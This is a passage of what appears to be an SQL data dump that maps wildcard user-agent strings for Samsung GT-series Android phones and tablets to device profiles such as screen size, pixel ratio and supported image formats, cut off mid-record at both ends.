(Linux; Android 4.*; GT-I9195) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9195I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9195L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9205) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9260) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9295) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9300) AppleWebKit/* (KHTML, like Gecko) Chrome','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9300) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9300) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9300-ORANGE) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9300I) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9300I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9300I) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9301I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9301I) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9301Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9305) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9305) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9308) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9500) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9506) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9506) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9515) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-I9515L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-N5100) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-N5100) AppleWebKit/* (KHTML, like Gecko) Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-N5110) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-N5110) AppleWebKit/* (KHTML, like Gecko) Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-N7000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-N7000) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-N7100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-N7100) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-N7102) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-N7105) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-N7105) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-N7105-ORANGE) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-N8000) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-N8010) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-P3100) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-P3100) AppleWebKit/* (KHTML, like Gecko) Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-P3110) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-P3110) AppleWebKit/* (KHTML, like Gecko) Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-P5100) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-P5100) AppleWebKit/* (KHTML, like Gecko) Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-P5110) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-P5110) AppleWebKit/* (KHTML, like Gecko) Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-P5200) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-P5210) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-P5210) AppleWebKit/* (KHTML, like Gecko) Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5280) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5280) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5282) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5282) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5301) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5301B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5301B) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5301L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5301L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5303) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5303B) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5310) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5310B) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5310I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5310L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5310L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5310M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5312) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5312) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5312B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5312B) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5312C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S5312L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6010) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6012) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6293T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6310) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6310) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6310L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6310L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6310N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6310N) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6310N-ORANGE) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6310T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6312) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GT-S6312) AppleWebKit/* (KHTML, like Gecko) Mobile 